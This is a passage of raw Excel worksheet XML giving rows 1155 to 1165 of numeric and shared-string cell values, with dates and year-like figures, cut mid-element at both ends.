      </c>
      <c r="AW1155">
        <v>0</v>
      </c>
      <c r="AX1155">
        <v>0</v>
      </c>
      <c r="AY1155">
        <v>2</v>
      </c>
      <c r="AZ1155">
        <v>5</v>
      </c>
      <c r="BA1155" t="s">
        <v>17629</v>
      </c>
      <c r="BB1155">
        <v>0</v>
      </c>
      <c r="BC1155" t="s">
        <v>13472</v>
      </c>
      <c r="BD1155" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1156" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1156">
        <v>2733</v>
      </c>
      <c r="B1156" t="s">
        <v>8671</v>
      </c>
      <c r="C1156" t="s">
        <v>2760</v>
      </c>
      <c r="D1156" t="s">
        <v>8672</v>
      </c>
      <c r="E1156" t="s">
        <v>8673</v>
      </c>
      <c r="F1156" t="s">
        <v>8674</v>
      </c>
      <c r="G1156" s="1">
        <v>44312</v>
      </c>
      <c r="H1156">
        <v>9390</v>
      </c>
      <c r="I1156">
        <v>9390</v>
      </c>
      <c r="J1156">
        <v>0</v>
      </c>
      <c r="K1156">
        <v>0</v>
      </c>
      <c r="L1156">
        <v>2</v>
      </c>
      <c r="M1156">
        <v>0</v>
      </c>
      <c r="N1156">
        <v>0</v>
      </c>
      <c r="O1156">
        <v>0</v>
      </c>
      <c r="P1156">
        <v>0</v>
      </c>
      <c r="Q1156">
        <v>2</v>
      </c>
      <c r="R1156">
        <v>16</v>
      </c>
      <c r="S1156">
        <v>0</v>
      </c>
      <c r="T1156">
        <v>0</v>
      </c>
      <c r="U1156">
        <v>0</v>
      </c>
      <c r="V1156">
        <v>0</v>
      </c>
      <c r="W1156">
        <v>300</v>
      </c>
      <c r="X1156">
        <v>0</v>
      </c>
      <c r="Y1156">
        <v>0</v>
      </c>
      <c r="Z1156">
        <v>0</v>
      </c>
      <c r="AA1156">
        <v>0</v>
      </c>
      <c r="AB1156">
        <v>1000</v>
      </c>
      <c r="AC1156">
        <v>50</v>
      </c>
      <c r="AD1156">
        <v>0</v>
      </c>
      <c r="AE1156">
        <v>0</v>
      </c>
      <c r="AF1156" t="s">
        <v>8675</v>
      </c>
      <c r="AG1156">
        <v>83676</v>
      </c>
      <c r="AH1156">
        <v>18</v>
      </c>
      <c r="AJ1156">
        <v>285</v>
      </c>
      <c r="AK1156" t="s">
        <v>5814</v>
      </c>
      <c r="AL1156" t="s">
        <v>8676</v>
      </c>
      <c r="AM1156" t="s">
        <v>8677</v>
      </c>
      <c r="AN1156" t="s">
        <v>68</v>
      </c>
      <c r="AO1156">
        <v>2020</v>
      </c>
      <c r="AP1156">
        <v>85338055165</v>
      </c>
      <c r="AQ1156" t="s">
        <v>8678</v>
      </c>
      <c r="AR1156" t="s">
        <v>8675</v>
      </c>
      <c r="AS1156" t="s">
        <v>71</v>
      </c>
      <c r="AT1156" t="s">
        <v>72</v>
      </c>
      <c r="AU1156">
        <v>7</v>
      </c>
      <c r="AV1156">
        <v>0</v>
      </c>
      <c r="AW1156">
        <v>0</v>
      </c>
      <c r="AX1156">
        <v>0</v>
      </c>
      <c r="AY1156">
        <v>13</v>
      </c>
      <c r="AZ1156">
        <v>1</v>
      </c>
      <c r="BA1156" t="s">
        <v>17298</v>
      </c>
      <c r="BB1156" t="s">
        <v>15911</v>
      </c>
      <c r="BC1156" t="s">
        <v>13297</v>
      </c>
      <c r="BD1156" t="s">
        <v>13298</v>
      </c>
    </row>
    <row r="1157" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1157">
        <v>5451</v>
      </c>
      <c r="B1157" t="s">
        <v>4860</v>
      </c>
      <c r="C1157" t="s">
        <v>157</v>
      </c>
      <c r="D1157" t="s">
        <v>8679</v>
      </c>
      <c r="E1157" t="s">
        <v>3440</v>
      </c>
      <c r="F1157" t="s">
        <v>8680</v>
      </c>
      <c r="G1157" s="1">
        <v>44375</v>
      </c>
      <c r="H1157">
        <v>9447</v>
      </c>
      <c r="I1157">
        <v>9447</v>
      </c>
      <c r="J1157">
        <v>0</v>
      </c>
      <c r="K1157">
        <v>0</v>
      </c>
      <c r="L1157">
        <v>0</v>
      </c>
      <c r="M1157">
        <v>0</v>
      </c>
      <c r="N1157">
        <v>0</v>
      </c>
      <c r="O1157">
        <v>0</v>
      </c>
      <c r="P1157">
        <v>0</v>
      </c>
      <c r="Q1157">
        <v>0</v>
      </c>
      <c r="R1157">
        <v>0</v>
      </c>
      <c r="S1157">
        <v>0</v>
      </c>
      <c r="T1157">
        <v>1</v>
      </c>
      <c r="U1157">
        <v>0</v>
      </c>
      <c r="V1157">
        <v>0</v>
      </c>
      <c r="W1157">
        <v>0</v>
      </c>
      <c r="X1157">
        <v>0</v>
      </c>
      <c r="Y1157">
        <v>0</v>
      </c>
      <c r="Z1157">
        <v>0</v>
      </c>
      <c r="AA1157">
        <v>0</v>
      </c>
      <c r="AB1157">
        <v>0</v>
      </c>
      <c r="AC1157">
        <v>0</v>
      </c>
      <c r="AD1157">
        <v>0</v>
      </c>
      <c r="AE1157">
        <v>15000</v>
      </c>
      <c r="AF1157" t="s">
        <v>4863</v>
      </c>
      <c r="AG1157">
        <v>60134</v>
      </c>
      <c r="AH1157">
        <v>16</v>
      </c>
      <c r="AJ1157">
        <v>264</v>
      </c>
      <c r="AK1157" t="s">
        <v>8681</v>
      </c>
      <c r="AL1157" t="s">
        <v>8682</v>
      </c>
      <c r="AM1157" t="s">
        <v>8683</v>
      </c>
      <c r="AN1157" t="s">
        <v>55</v>
      </c>
      <c r="AO1157">
        <v>2012</v>
      </c>
      <c r="AP1157">
        <v>81216609559</v>
      </c>
      <c r="AQ1157" t="s">
        <v>8684</v>
      </c>
      <c r="AR1157" t="s">
        <v>4863</v>
      </c>
      <c r="AS1157" t="s">
        <v>71</v>
      </c>
      <c r="AT1157" t="s">
        <v>58</v>
      </c>
      <c r="AU1157">
        <v>22</v>
      </c>
      <c r="AV1157">
        <v>1</v>
      </c>
      <c r="AW1157">
        <v>0</v>
      </c>
      <c r="AX1157">
        <v>0</v>
      </c>
      <c r="AY1157">
        <v>8</v>
      </c>
      <c r="AZ1157">
        <v>1</v>
      </c>
      <c r="BA1157" t="s">
        <v>17050</v>
      </c>
      <c r="BB1157" t="s">
        <v>16143</v>
      </c>
      <c r="BC1157" t="s">
        <v>10010</v>
      </c>
      <c r="BD1157" t="s">
        <v>10391</v>
      </c>
    </row>
    <row r="1158" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1158">
        <v>5461</v>
      </c>
      <c r="B1158" t="s">
        <v>8685</v>
      </c>
      <c r="C1158" t="s">
        <v>318</v>
      </c>
      <c r="D1158" t="s">
        <v>8686</v>
      </c>
      <c r="E1158" t="s">
        <v>363</v>
      </c>
      <c r="F1158" t="s">
        <v>364</v>
      </c>
      <c r="G1158" s="1">
        <v>44300</v>
      </c>
      <c r="H1158">
        <v>9488</v>
      </c>
      <c r="I1158">
        <v>9488</v>
      </c>
      <c r="J1158">
        <v>0</v>
      </c>
      <c r="K1158">
        <v>0</v>
      </c>
      <c r="L1158">
        <v>0</v>
      </c>
      <c r="M1158">
        <v>0</v>
      </c>
      <c r="N1158">
        <v>0</v>
      </c>
      <c r="O1158">
        <v>0</v>
      </c>
      <c r="P1158">
        <v>0</v>
      </c>
      <c r="Q1158">
        <v>0</v>
      </c>
      <c r="R1158">
        <v>0</v>
      </c>
      <c r="S1158">
        <v>0</v>
      </c>
      <c r="T1158">
        <v>1</v>
      </c>
      <c r="U1158">
        <v>0</v>
      </c>
      <c r="V1158">
        <v>0</v>
      </c>
      <c r="W1158">
        <v>0</v>
      </c>
      <c r="X1158">
        <v>0</v>
      </c>
      <c r="Y1158">
        <v>0</v>
      </c>
      <c r="Z1158">
        <v>0</v>
      </c>
      <c r="AA1158">
        <v>0</v>
      </c>
      <c r="AB1158">
        <v>0</v>
      </c>
      <c r="AC1158">
        <v>0</v>
      </c>
      <c r="AD1158">
        <v>0</v>
      </c>
      <c r="AE1158">
        <v>750000</v>
      </c>
      <c r="AF1158" t="s">
        <v>8687</v>
      </c>
      <c r="AG1158">
        <v>90244</v>
      </c>
      <c r="AH1158">
        <v>26</v>
      </c>
      <c r="AJ1158">
        <v>420</v>
      </c>
      <c r="AK1158" t="s">
        <v>8688</v>
      </c>
      <c r="AL1158" t="s">
        <v>8689</v>
      </c>
      <c r="AM1158" t="s">
        <v>8690</v>
      </c>
      <c r="AN1158" t="s">
        <v>68</v>
      </c>
      <c r="AO1158">
        <v>2011</v>
      </c>
      <c r="AP1158">
        <v>811416002</v>
      </c>
      <c r="AQ1158" t="s">
        <v>8691</v>
      </c>
      <c r="AR1158" t="s">
        <v>8692</v>
      </c>
      <c r="AS1158" t="s">
        <v>371</v>
      </c>
      <c r="AT1158" t="s">
        <v>72</v>
      </c>
      <c r="AU1158">
        <v>56</v>
      </c>
      <c r="AV1158">
        <v>30</v>
      </c>
      <c r="AW1158">
        <v>6</v>
      </c>
      <c r="AX1158">
        <v>0</v>
      </c>
      <c r="AY1158">
        <v>5</v>
      </c>
      <c r="AZ1158">
        <v>3</v>
      </c>
      <c r="BA1158" t="s">
        <v>16881</v>
      </c>
      <c r="BB1158" t="s">
        <v>16144</v>
      </c>
      <c r="BC1158">
        <v>0</v>
      </c>
      <c r="BD1158" t="s">
        <v>13791</v>
      </c>
    </row>
    <row r="1159" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1159">
        <v>5454</v>
      </c>
      <c r="B1159" t="s">
        <v>8693</v>
      </c>
      <c r="C1159" t="s">
        <v>129</v>
      </c>
      <c r="D1159" t="s">
        <v>8694</v>
      </c>
      <c r="E1159" t="s">
        <v>111</v>
      </c>
      <c r="F1159" t="s">
        <v>1223</v>
      </c>
      <c r="G1159" s="1">
        <v>44307</v>
      </c>
      <c r="H1159">
        <v>9498</v>
      </c>
      <c r="I1159">
        <v>9498</v>
      </c>
      <c r="J1159">
        <v>1</v>
      </c>
      <c r="K1159">
        <v>1</v>
      </c>
      <c r="L1159">
        <v>0</v>
      </c>
      <c r="M1159">
        <v>0</v>
      </c>
      <c r="N1159">
        <v>0</v>
      </c>
      <c r="O1159">
        <v>0</v>
      </c>
      <c r="P1159">
        <v>0</v>
      </c>
      <c r="Q1159">
        <v>2</v>
      </c>
      <c r="R1159">
        <v>0</v>
      </c>
      <c r="S1159">
        <v>0</v>
      </c>
      <c r="T1159">
        <v>1</v>
      </c>
      <c r="U1159">
        <v>15000</v>
      </c>
      <c r="V1159">
        <v>5000</v>
      </c>
      <c r="W1159">
        <v>0</v>
      </c>
      <c r="X1159">
        <v>0</v>
      </c>
      <c r="Y1159">
        <v>0</v>
      </c>
      <c r="Z1159">
        <v>0</v>
      </c>
      <c r="AA1159">
        <v>0</v>
      </c>
      <c r="AB1159">
        <v>500</v>
      </c>
      <c r="AC1159">
        <v>0</v>
      </c>
      <c r="AD1159">
        <v>0</v>
      </c>
      <c r="AE1159">
        <v>1000</v>
      </c>
      <c r="AF1159" t="s">
        <v>8695</v>
      </c>
      <c r="AG1159">
        <v>15211</v>
      </c>
      <c r="AH1159">
        <v>11</v>
      </c>
      <c r="AJ1159">
        <v>268</v>
      </c>
      <c r="AK1159" t="s">
        <v>252</v>
      </c>
      <c r="AL1159" t="s">
        <v>2955</v>
      </c>
      <c r="AM1159" t="s">
        <v>8696</v>
      </c>
      <c r="AN1159" t="s">
        <v>55</v>
      </c>
      <c r="AO1159">
        <v>2014</v>
      </c>
      <c r="AP1159">
        <v>215558692</v>
      </c>
      <c r="AQ1159" t="s">
        <v>8697</v>
      </c>
      <c r="AR1159" t="s">
        <v>8695</v>
      </c>
      <c r="AS1159" t="s">
        <v>71</v>
      </c>
      <c r="AT1159" t="s">
        <v>58</v>
      </c>
      <c r="AU1159">
        <v>26</v>
      </c>
      <c r="AV1159">
        <v>1</v>
      </c>
      <c r="AW1159">
        <v>18</v>
      </c>
      <c r="AX1159">
        <v>2</v>
      </c>
      <c r="AY1159">
        <v>8</v>
      </c>
      <c r="AZ1159">
        <v>4</v>
      </c>
      <c r="BA1159" t="s">
        <v>16765</v>
      </c>
      <c r="BB1159" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1159">
        <v>0</v>
      </c>
      <c r="BD1159" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="1160" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1160">
        <v>5468</v>
      </c>
      <c r="B1160" t="s">
        <v>8698</v>
      </c>
      <c r="C1160" t="s">
        <v>157</v>
      </c>
      <c r="D1160" t="s">
        <v>8699</v>
      </c>
      <c r="E1160" t="s">
        <v>363</v>
      </c>
      <c r="F1160" t="s">
        <v>8700</v>
      </c>
      <c r="G1160" s="1">
        <v>44300</v>
      </c>
      <c r="H1160">
        <v>9526</v>
      </c>
      <c r="I1160">
        <v>9526</v>
      </c>
      <c r="J1160">
        <v>0</v>
      </c>
      <c r="K1160">
        <v>0</v>
      </c>
      <c r="L1160">
        <v>0</v>
      </c>
      <c r="M1160">
        <v>0</v>
      </c>
      <c r="N1160">
        <v>0</v>
      </c>
      <c r="O1160">
        <v>0</v>
      </c>
      <c r="P1160">
        <v>0</v>
      </c>
      <c r="Q1160">
        <v>1</v>
      </c>
      <c r="R1160">
        <v>0</v>
      </c>
      <c r="S1160">
        <v>0</v>
      </c>
      <c r="T1160">
        <v>1</v>
      </c>
      <c r="U1160">
        <v>0</v>
      </c>
      <c r="V1160">
        <v>0</v>
      </c>
      <c r="W1160">
        <v>0</v>
      </c>
      <c r="X1160">
        <v>0</v>
      </c>
      <c r="Y1160">
        <v>0</v>
      </c>
      <c r="Z1160">
        <v>0</v>
      </c>
      <c r="AA1160">
        <v>0</v>
      </c>
      <c r="AB1160">
        <v>200</v>
      </c>
      <c r="AC1160">
        <v>0</v>
      </c>
      <c r="AD1160">
        <v>0</v>
      </c>
      <c r="AE1160">
        <v>500</v>
      </c>
      <c r="AF1160" t="s">
        <v>8701</v>
      </c>
      <c r="AG1160">
        <v>69323</v>
      </c>
      <c r="AH1160">
        <v>16</v>
      </c>
      <c r="AJ1160">
        <v>255</v>
      </c>
      <c r="AK1160" t="s">
        <v>8702</v>
      </c>
      <c r="AL1160" t="s">
        <v>8703</v>
      </c>
      <c r="AM1160" t="s">
        <v>8704</v>
      </c>
      <c r="AN1160" t="s">
        <v>68</v>
      </c>
      <c r="AO1160">
        <v>2018</v>
      </c>
      <c r="AP1160" t="s">
        <v>8705</v>
      </c>
      <c r="AQ1160" t="s">
        <v>8705</v>
      </c>
      <c r="AR1160" t="s">
        <v>8701</v>
      </c>
      <c r="AS1160" t="s">
        <v>71</v>
      </c>
      <c r="AT1160" t="s">
        <v>72</v>
      </c>
      <c r="AU1160">
        <v>25</v>
      </c>
      <c r="AV1160">
        <v>1</v>
      </c>
      <c r="AW1160">
        <v>2</v>
      </c>
      <c r="AX1160">
        <v>10</v>
      </c>
      <c r="AY1160">
        <v>2</v>
      </c>
      <c r="AZ1160">
        <v>0</v>
      </c>
      <c r="BA1160" t="s">
        <v>17683</v>
      </c>
      <c r="BB1160">
        <v>0</v>
      </c>
      <c r="BC1160" t="s">
        <v>13355</v>
      </c>
      <c r="BD1160">
        <v>0</v>
      </c>
    </row>
    <row r="1161" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1161">
        <v>5469</v>
      </c>
      <c r="B1161" t="s">
        <v>8706</v>
      </c>
      <c r="C1161" t="s">
        <v>157</v>
      </c>
      <c r="D1161" t="s">
        <v>8707</v>
      </c>
      <c r="E1161" t="s">
        <v>8708</v>
      </c>
      <c r="F1161" t="s">
        <v>8709</v>
      </c>
      <c r="G1161" s="1">
        <v>44306</v>
      </c>
      <c r="H1161">
        <v>9544</v>
      </c>
      <c r="I1161">
        <v>9544</v>
      </c>
      <c r="J1161">
        <v>0</v>
      </c>
      <c r="K1161">
        <v>0</v>
      </c>
      <c r="L1161">
        <v>0</v>
      </c>
      <c r="M1161">
        <v>0</v>
      </c>
      <c r="N1161">
        <v>0</v>
      </c>
      <c r="O1161">
        <v>6</v>
      </c>
      <c r="P1161">
        <v>0</v>
      </c>
      <c r="Q1161">
        <v>0</v>
      </c>
      <c r="R1161">
        <v>0</v>
      </c>
      <c r="S1161">
        <v>0</v>
      </c>
      <c r="T1161">
        <v>1</v>
      </c>
      <c r="U1161">
        <v>0</v>
      </c>
      <c r="V1161">
        <v>0</v>
      </c>
      <c r="W1161">
        <v>0</v>
      </c>
      <c r="X1161">
        <v>0</v>
      </c>
      <c r="Y1161">
        <v>0</v>
      </c>
      <c r="Z1161">
        <v>6000</v>
      </c>
      <c r="AA1161">
        <v>0</v>
      </c>
      <c r="AB1161">
        <v>0</v>
      </c>
      <c r="AC1161">
        <v>0</v>
      </c>
      <c r="AD1161">
        <v>0</v>
      </c>
      <c r="AE1161">
        <v>300</v>
      </c>
      <c r="AF1161" t="s">
        <v>8710</v>
      </c>
      <c r="AG1161">
        <v>63518</v>
      </c>
      <c r="AH1161">
        <v>16</v>
      </c>
      <c r="AJ1161">
        <v>228</v>
      </c>
      <c r="AK1161" t="s">
        <v>6541</v>
      </c>
      <c r="AL1161" t="s">
        <v>8711</v>
      </c>
      <c r="AM1161" t="s">
        <v>8712</v>
      </c>
      <c r="AN1161" t="s">
        <v>68</v>
      </c>
      <c r="AO1161">
        <v>2012</v>
      </c>
      <c r="AP1161" t="s">
        <v>8713</v>
      </c>
      <c r="AQ1161" t="s">
        <v>8713</v>
      </c>
      <c r="AR1161" t="s">
        <v>8710</v>
      </c>
      <c r="AS1161" t="s">
        <v>71</v>
      </c>
      <c r="AT1161" t="s">
        <v>72</v>
      </c>
      <c r="AU1161">
        <v>25</v>
      </c>
      <c r="AV1161">
        <v>1</v>
      </c>
      <c r="AW1161">
        <v>1</v>
      </c>
      <c r="AX1161">
        <v>10</v>
      </c>
      <c r="AY1161">
        <v>2</v>
      </c>
      <c r="AZ1161">
        <v>1</v>
      </c>
      <c r="BA1161" t="s">
        <v>17684</v>
      </c>
      <c r="BB1161">
        <v>0</v>
      </c>
      <c r="BC1161" t="s">
        <v>13358</v>
      </c>
      <c r="BD1161">
        <v>0</v>
      </c>
    </row>
    <row r="1162" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1162">
        <v>5432</v>
      </c>
      <c r="B1162" t="s">
        <v>8714</v>
      </c>
      <c r="C1162" t="s">
        <v>157</v>
      </c>
      <c r="D1162" t="s">
        <v>8715</v>
      </c>
      <c r="E1162" t="s">
        <v>363</v>
      </c>
      <c r="F1162" t="s">
        <v>3204</v>
      </c>
      <c r="G1162" s="1">
        <v>44294</v>
      </c>
      <c r="H1162">
        <v>9597</v>
      </c>
      <c r="I1162">
        <v>9597</v>
      </c>
      <c r="J1162">
        <v>0</v>
      </c>
      <c r="K1162">
        <v>0</v>
      </c>
      <c r="L1162">
        <v>0</v>
      </c>
      <c r="M1162">
        <v>0</v>
      </c>
      <c r="N1162">
        <v>0</v>
      </c>
      <c r="O1162">
        <v>0</v>
      </c>
      <c r="P1162">
        <v>0</v>
      </c>
      <c r="Q1162">
        <v>1</v>
      </c>
      <c r="R1162">
        <v>1</v>
      </c>
      <c r="S1162">
        <v>0</v>
      </c>
      <c r="T1162">
        <v>1</v>
      </c>
      <c r="U1162">
        <v>0</v>
      </c>
      <c r="V1162">
        <v>0</v>
      </c>
      <c r="W1162">
        <v>0</v>
      </c>
      <c r="X1162">
        <v>0</v>
      </c>
      <c r="Y1162">
        <v>0</v>
      </c>
      <c r="Z1162">
        <v>0</v>
      </c>
      <c r="AA1162">
        <v>0</v>
      </c>
      <c r="AB1162">
        <v>50</v>
      </c>
      <c r="AC1162">
        <v>1000</v>
      </c>
      <c r="AD1162">
        <v>0</v>
      </c>
      <c r="AE1162">
        <v>1000</v>
      </c>
      <c r="AF1162" t="s">
        <v>8716</v>
      </c>
      <c r="AG1162">
        <v>60134</v>
      </c>
      <c r="AH1162">
        <v>16</v>
      </c>
      <c r="AJ1162">
        <v>264</v>
      </c>
      <c r="AK1162" t="s">
        <v>8717</v>
      </c>
      <c r="AL1162" t="s">
        <v>8718</v>
      </c>
      <c r="AM1162" t="s">
        <v>8719</v>
      </c>
      <c r="AN1162" t="s">
        <v>55</v>
      </c>
      <c r="AO1162">
        <v>2020</v>
      </c>
      <c r="AP1162" t="s">
        <v>8720</v>
      </c>
      <c r="AQ1162" t="s">
        <v>8721</v>
      </c>
      <c r="AR1162" t="s">
        <v>8716</v>
      </c>
      <c r="AS1162" t="s">
        <v>71</v>
      </c>
      <c r="AT1162" t="s">
        <v>58</v>
      </c>
      <c r="AU1162">
        <v>27</v>
      </c>
      <c r="AV1162">
        <v>0</v>
      </c>
      <c r="AW1162">
        <v>4</v>
      </c>
      <c r="AX1162">
        <v>0</v>
      </c>
      <c r="AY1162">
        <v>6</v>
      </c>
      <c r="AZ1162">
        <v>2</v>
      </c>
      <c r="BA1162" t="s">
        <v>17673</v>
      </c>
      <c r="BB1162">
        <v>0</v>
      </c>
      <c r="BC1162">
        <v>0</v>
      </c>
      <c r="BD1162" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="1163" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1163">
        <v>5166</v>
      </c>
      <c r="B1163" t="s">
        <v>8722</v>
      </c>
      <c r="C1163" t="s">
        <v>88</v>
      </c>
      <c r="D1163" t="s">
        <v>8723</v>
      </c>
      <c r="E1163" t="s">
        <v>300</v>
      </c>
      <c r="F1163" t="s">
        <v>8724</v>
      </c>
      <c r="G1163" s="1">
        <v>44341</v>
      </c>
      <c r="H1163">
        <v>9659</v>
      </c>
      <c r="I1163">
        <v>9659</v>
      </c>
      <c r="J1163">
        <v>1</v>
      </c>
      <c r="K1163">
        <v>1</v>
      </c>
      <c r="L1163">
        <v>1</v>
      </c>
      <c r="M1163">
        <v>0</v>
      </c>
      <c r="N1163">
        <v>0</v>
      </c>
      <c r="O1163">
        <v>0</v>
      </c>
      <c r="P1163">
        <v>0</v>
      </c>
      <c r="Q1163">
        <v>2</v>
      </c>
      <c r="R1163">
        <v>4</v>
      </c>
      <c r="S1163">
        <v>0</v>
      </c>
      <c r="T1163">
        <v>1</v>
      </c>
      <c r="U1163">
        <v>17000</v>
      </c>
      <c r="V1163">
        <v>1</v>
      </c>
      <c r="W1163">
        <v>7000</v>
      </c>
      <c r="X1163">
        <v>0</v>
      </c>
      <c r="Y1163">
        <v>0</v>
      </c>
      <c r="Z1163">
        <v>0</v>
      </c>
      <c r="AA1163">
        <v>0</v>
      </c>
      <c r="AB1163">
        <v>30</v>
      </c>
      <c r="AC1163">
        <v>50</v>
      </c>
      <c r="AD1163">
        <v>0</v>
      </c>
      <c r="AE1163">
        <v>0</v>
      </c>
      <c r="AF1163" t="s">
        <v>8725</v>
      </c>
      <c r="AG1163">
        <v>80224</v>
      </c>
      <c r="AH1163">
        <v>17</v>
      </c>
      <c r="AJ1163">
        <v>282</v>
      </c>
      <c r="AK1163" t="s">
        <v>592</v>
      </c>
      <c r="AL1163" t="s">
        <v>8726</v>
      </c>
      <c r="AM1163" t="s">
        <v>8727</v>
      </c>
      <c r="AN1163" t="s">
        <v>55</v>
      </c>
      <c r="AO1163">
        <v>2013</v>
      </c>
      <c r="AP1163" t="s">
        <v>8728</v>
      </c>
      <c r="AQ1163" t="s">
        <v>8729</v>
      </c>
      <c r="AR1163" t="s">
        <v>8730</v>
      </c>
      <c r="AS1163" t="s">
        <v>71</v>
      </c>
      <c r="AT1163" t="s">
        <v>58</v>
      </c>
      <c r="AU1163">
        <v>0</v>
      </c>
      <c r="AV1163">
        <v>0</v>
      </c>
      <c r="AW1163">
        <v>10</v>
      </c>
      <c r="AX1163">
        <v>10</v>
      </c>
      <c r="AY1163">
        <v>2</v>
      </c>
      <c r="AZ1163">
        <v>2</v>
      </c>
      <c r="BA1163" t="s">
        <v>17608</v>
      </c>
      <c r="BB1163">
        <v>0</v>
      </c>
      <c r="BC1163" t="s">
        <v>11192</v>
      </c>
      <c r="BD1163" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="1164" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1164">
        <v>5456</v>
      </c>
      <c r="B1164" t="s">
        <v>8731</v>
      </c>
      <c r="C1164" t="s">
        <v>458</v>
      </c>
      <c r="D1164" t="s">
        <v>8732</v>
      </c>
      <c r="E1164" t="s">
        <v>843</v>
      </c>
      <c r="F1164" t="s">
        <v>3814</v>
      </c>
      <c r="G1164" s="1">
        <v>44323</v>
      </c>
      <c r="H1164">
        <v>9670</v>
      </c>
      <c r="I1164">
        <v>9670</v>
      </c>
      <c r="J1164">
        <v>0</v>
      </c>
      <c r="K1164">
        <v>0</v>
      </c>
      <c r="L1164">
        <v>0</v>
      </c>
      <c r="M1164">
        <v>0</v>
      </c>
      <c r="N1164">
        <v>0</v>
      </c>
      <c r="O1164">
        <v>0</v>
      </c>
      <c r="P1164">
        <v>0</v>
      </c>
      <c r="Q1164">
        <v>1</v>
      </c>
      <c r="R1164">
        <v>1</v>
      </c>
      <c r="S1164">
        <v>0</v>
      </c>
      <c r="T1164">
        <v>1</v>
      </c>
      <c r="U1164">
        <v>0</v>
      </c>
      <c r="V1164">
        <v>0</v>
      </c>
      <c r="W1164">
        <v>0</v>
      </c>
      <c r="X1164">
        <v>0</v>
      </c>
      <c r="Y1164">
        <v>0</v>
      </c>
      <c r="Z1164">
        <v>0</v>
      </c>
      <c r="AA1164">
        <v>0</v>
      </c>
      <c r="AB1164">
        <v>1000</v>
      </c>
      <c r="AC1164">
        <v>2000</v>
      </c>
      <c r="AD1164">
        <v>0</v>
      </c>
      <c r="AE1164">
        <v>10000</v>
      </c>
      <c r="AF1164" t="s">
        <v>8733</v>
      </c>
      <c r="AG1164">
        <v>29433</v>
      </c>
      <c r="AH1164">
        <v>5</v>
      </c>
      <c r="AJ1164">
        <v>153</v>
      </c>
      <c r="AK1164" t="s">
        <v>2427</v>
      </c>
      <c r="AL1164" t="s">
        <v>8734</v>
      </c>
      <c r="AM1164" t="s">
        <v>8735</v>
      </c>
      <c r="AN1164" t="s">
        <v>55</v>
      </c>
      <c r="AO1164">
        <v>2021</v>
      </c>
      <c r="AP1164">
        <v>82268881919</v>
      </c>
      <c r="AQ1164" t="s">
        <v>8736</v>
      </c>
      <c r="AR1164" t="s">
        <v>3876</v>
      </c>
      <c r="AS1164" t="s">
        <v>71</v>
      </c>
      <c r="AT1164" t="s">
        <v>58</v>
      </c>
      <c r="AU1164">
        <v>30</v>
      </c>
      <c r="AV1164">
        <v>1</v>
      </c>
      <c r="AW1164">
        <v>2</v>
      </c>
      <c r="AX1164">
        <v>0</v>
      </c>
      <c r="AY1164">
        <v>1</v>
      </c>
      <c r="AZ1164">
        <v>1</v>
      </c>
      <c r="BA1164" t="s">
        <v>17680</v>
      </c>
      <c r="BB1164">
        <v>0</v>
      </c>
      <c r="BC1164" t="s">
        <v>9638</v>
      </c>
      <c r="BD1164" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="1165" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1165">
        <v>5452</v>
      </c>
      <c r="B1165" t="s">
        <v>8737</v>
      </c>
      <c r="C1165" t="s">
        <v>99</v>
      </c>
      <c r="D1165" t="s">
        <v>8738</v>
      </c>
      <c r="E1165" t="s">
        <v>142</v>
      </c>
      <c r="F1165" t="s">
        <v>666</v>
      </c>
      <c r="G1165" s="1">
        <v>44351</v>
      </c>
      <c r="H1165">
        <v>9681</v>
      </c>
      <c r="I1165">
        <v>9681</v>
      </c>
      <c r="J1165">
        <v>1</v>
      </c>
      <c r="K1165">
        <v>0</v>
      </c>
      <c r="L1165">
        <v>0</v>
      </c>
      <c r="M1165">
        <v>0</v>
      </c>
      <c r="N1165">
        <v>0</v>
      </c>
      <c r="O1165">
        <v>0</v>
      </c>
      <c r="P1165">
        <v>0</v>
      </c>
      <c r="Q1165">
        <v>0</v>
      </c>
      <c r="R1165">
        <v>0</v>
      </c>
      <c r="S1165">
        <v>0</v>
      </c>
      <c r="T1165">
        <v>0</v>
      </c>
      <c r="U1165">
        <v>200000</v>
      </c>
      <c r="V1165">
        <v>0</v>
      </c>
      <c r="W1165">
        <v>0</v>
      </c>
      <c r="X1165">
        <v>0</v>
      </c>
      <c r="Y1165">
        <v>0</v>
      </c>
      <c r="Z1165">
        <v>0</v>
      </c>
      <c r="AA1165">
        <v>0</v>
      </c>
      <c r="AB1165">
        <v>0</v>
      </c>
      <c r="AC1165">
        <v>0</v>
      </c>
      <c r="AD1165">
        <v>0</v>
      </c>
      <c r="AE1165">
        <v>0</v>
      </c>
      <c r="AF1165" t="s">
        <v>8739</v>
      </c>
      <c r="AG1165">
        <v>14450</v>
      </c>
      <c r="AH1165">
        <v>12</v>
      </c>
      <c r="AJ1165">
        <v>160</v>
      </c>
      <c r="AK1165" t="s">
        <v>114</v>
      </c>
      <c r="AL1165" t="s">
        <v>114</v>
      </c>
      <c r="AM1165" t="s">
        <v>8740</v>
      </c>
      <c r="AN1165" t="s">
        <v>68</v>
      </c>
      <c r="AO1165">
        <v>2017</v>
      </c>
      <c r="AP1165">
        <v>8119999062</v>
      </c>
      <c r="AQ1165" t="s">
        <v>8741</v>
      </c>
      <c r="AR1165" t="s">
        <v>8739</v>
      </c>
      <c r="AS1165" t="s">
        <v>371</v>
      </c>
      <c r="AT1165" t="s">
        <v>72</v>
      </c>
      <c r="AU1165">
        <v>0</v>
      </c>
      <c r="AV1165">
        <v>0</v>
      </c>
      <c r="AW1165">
        <v>0</v>
      </c>
      <c r="AX1165">
        <v>0</v>
      </c>
      <c r="AY1165">
        <v>13</v>
      </c>
      <c r="AZ1165">
        <v>2</v>
      </c>
      <c r="BA1165" t="s">
        <v>17679</v>
      </c>
